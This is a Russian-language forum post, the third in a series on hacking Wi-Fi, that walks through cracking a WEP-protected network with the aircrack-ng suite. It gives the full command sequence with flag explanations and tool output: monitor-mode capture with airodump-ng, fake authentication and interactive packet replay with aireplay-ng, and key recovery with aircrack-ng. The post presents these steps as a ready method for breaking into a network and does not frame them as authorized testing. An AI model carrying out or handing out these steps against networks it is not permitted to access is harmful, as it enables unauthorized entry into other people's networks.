Показать сообщение отдельно
Старый 03.02.2012, 20:10    Топик Стартер ТС   #3 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Взлом Wi-Fi сети (WEP) – часть 3

Всем привет!

Цикл статей по анализу и взлому wi-fi сетей продолжается. Сегодня покажу вам еще один метод взлома.

Первое, что делаем переводим интерфейс в режим монитора (monitor mode), как это делается читайте в статье “Взлом Wi-Fi сети – часть 1“.

Просматриваем wi-fi сети в радиусе действия.

Код:
# airodump-ng mon0

Click the image to open in full size.

Теперь настроимся на нашу wi-fi сеть.

Код:
# airodump-ng -c 1 -w wep_0841 --bssid 00:22:B0:BE:75:3D mon0
  • -c – номер канала
  • -w – название дамп-файла
  • –bssid – MAC-адрес точки доступа

Далее производим фиктивную аутентификацию – Fake authentication.

Код:
# aireplay-ng -1 0 -a 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0
  • -1 – фиктивная аутентификация
  • 0 – реассоциация времени (сек.)
  • -a – MAC-адрес точки доступа
  • -h – MAC-адрес клиента, который используем

Код:
14:21:29  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

14:21:29  Sending Authentication Request (Open System) [ACK]
14:21:29  Authentication successful
14:21:29  Sending Association Request

14:21:34  Sending Authentication Request (Open System)

14:21:36  Sending Authentication Request (Open System)

14:21:38  Sending Authentication Request (Open System)

14:21:40  Sending Authentication Request (Open System)

14:21:42  Sending Authentication Request (Open System) [ACK]
14:21:42  Authentication successful
14:21:42  Sending Association Request [ACK]
14:21:42  Association successful :-) (AID: 1)

Click the image to open in full size.

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0
  • -2 – interactive replay attack
  • -p 0841 – устанавливается Frame Control Field пакет, точно такой же, какой wi-fi клиент, в самом начале, отправляет точке доступа (AP)
  • -c FF:FF:FF:FF:FF:FF – MAC-адрес становится широковещательным (помогает получать новые IV – вектора инициализации)
  • -b – MAC-адрес точки доступа
  • -h – MAC-адрес нашего wi-fi клиента

Код:
Read 21 packets...

        Size: 139, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:22:B0:BE:75:3D
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:C0:CA:30:85:7A

        0x0000:  0842 0000 ffff ffff ffff 0022 b0be 753d  .B........."..u=
        0x0010:  00c0 ca30 857a 70ca 67aa 3500 4870 5b18  ...0.zp.g.5.Hp[.
        0x0020:  9494 adae 329f a896 7eb3 e9c1 2db9 b151  ....2...~...-..Q
        0x0030:  7f99 85eb 8d06 b6f6 6bc6 c651 3773 199c  .......k..Q7s..
        0x0040:  f4fe baff a285 5691 d915 8068 f6f0 ea4a  ......V....h...J
        0x0050:  057e 98c0 ae1a 89a7 c06e 5d0e 6538 2d84  .~.......n].e8-.
        0x0060:  7105 5018 799e 56b7 78eb 7b58 9de3 5ca8  q.P.y.V.x.{X..\.
        0x0070:  84bb 084c 4dad 6c1b cf74 987a 9250 3671  ...LM.l..t.z.P6q
        0x0080:  7ae9 4ce7 509f bdbb 6ebb f4              z.L.P...n..

Use this packet ? y

Saving chosen packet in replay_src-1223-142806.cap
You should also start airodump-ng to capture replies.

 351942 packets...(499 pps)
Когда накопится достаточное количество Data-пакетов, производим их расшифровку.

Код:
# aircrack-ng -a 1 -0 wep_0841.cap
  • -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
  • 1 – WEP
  • -0 – использовать цвет

Click the image to open in full size.

Вот и все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

Источник: www.levinkv.ru
levinkv вне форума   Ответить с цитированием
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
evgen (15.06.2013), lemurean (05.12.2014)
 
Время генерации страницы 0.07715 секунды с 14 запросами